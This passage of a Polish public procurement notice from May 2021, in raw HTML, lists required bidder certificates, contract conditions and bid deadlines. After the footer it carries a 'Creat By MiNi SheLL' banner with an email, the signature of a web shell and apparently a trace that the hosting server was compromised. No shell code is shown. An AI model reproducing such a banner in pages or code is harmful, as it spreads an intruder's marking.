pkt 1 i 2 ustawy Pzp sporządzona nie wcześniej niż 6 miesięcy przed jejzłożeniem.Zaświadczenie właściwego naczelnika urzędu skarbowegoZaświadczenie właściwegonaczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków iopłat, w zakresie art. 109 ust. 1 pkt 1 ustawy Pzp, wystawione nie wcześniej niż 3 miesiące przed jegozłożeniem. W przypadku zalegania z opłacaniem podatków lub opłat, wraz z zaświadczeniem,Zamawiający żąda złożenia przez Wykonawcę dokumentów potwierdzających, że odpowiednio przedupływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływemterminu składania ofert Wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkamilub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności.Zaświadczenie z ZUSlub KRUSZaświadczenie albo inny dokument właściwej terenowej jednostki organizacyjnej ZakładuUbezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowejKasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniemskładek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy Pzp,wystawione nie wcześniej niż 3 miesiące przed jego złożeniem. W przypadku zalegania z opłacaniemskładek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentemZamawiający żąda złożenia przez Wykonawcę dokumentów potwierdzających, że odpowiednio przedupływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływemterminu składania ofert Wykonawca dokonał płatności należnych składek na ubezpieczenia społecznelub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tychnależności.Odpis lub informacja z KRS lub CEIDGOdpis lub informacja z Krajowego RejestruSądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust.1 pkt 4 ustawy Pzp, sporządzone nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębneprzepisy wymagają wpisu do rejestru lub ewidencji.Oświadczenie o zatrudnianiu osób na podstawie umowy o pracę</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> CertyfikatCertyfikat wydany przez jednostkę oceniającą zgodność lub sprawozdanie z badańprzeprowadzonych przez tę jednostkę, w celu potwierdzenia zgodności oferowanych robótbudowlanych, dostaw lub usług z wymaganiami, cechami lub kryteriami określonymi w opisieprzedmiotu zamówienia lub kryteriami oceny ofert, lub wymaganiami związanymi z realizacjązamówienia.Certyfikat HACCAP, potwierdzający , że Wykonawca opracował, wykonuje iutrzymuje stałą procedurę lub procedury na podstawie zasad HACCP zgodnie z art 5Rozporządzenia (WE) nr 852/2004 Parlamentu Europejskiego i Rady z dnia 29.04.2004r. wsprawie higieny i środków spożywczych (DUUE L 139 s.1 ) <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> CertyfikatCertyfikat wydany przez jednostkę oceniającą zgodność lub sprawozdanie z badańprzeprowadzonych przez tę jednostkę, w celu potwierdzenia zgodności oferowanych robótbudowlanych, dostaw lub usług z wymaganiami, cechami lub kryteriami określonymi w opisieprzedmiotu zamówienia lub kryteriami oceny ofert, lub wymaganiami związanymi z realizacjązamówienia.Certyfikat HACCAP, potwierdzający , że Wykonawca opracował, wykonuje iutrzymuje stałą procedurę lub procedury na podstawie zasad HACCP zgodnie z art 5Rozporządzenia (WE) nr 852/2004 Parlamentu Europejskiego i Rady z dnia 29.04.2004r. wsprawie higieny i środków spożywczych (DUUE L 139 s.1 ) <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadkuWykonawcy zobowiązani są do ustanowienia pełnomocnika do reprezentowania ich wpostępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarciaumowy w sprawie zamówienia publicznego.2. Pełnomocnictwo należy dołączyć do oferty ipowinno ono zawierać w szczególności wskazanie:-postępowania o udzielenie zamówieniepublicznego, którego dotyczy;-wszystkich Wykonawców ubiegających się wspólnie o udzieleniezamówienia;- ustanowionego pełnomocnika oraz zakresu jego umocowania.3. W przypadkuwspólnego ubiegania się o zamówienie przez Wykonawców, dokument ”Oświadczenia oniepodleganiu wykluczeniu oraz spełnianiu warunków udziału”, o którym mowa w pkt. 9.1 SWZ,składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia tepotwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu wzakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-05-17 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://e-propublico.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-05-17 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-06-15</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-05-07 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com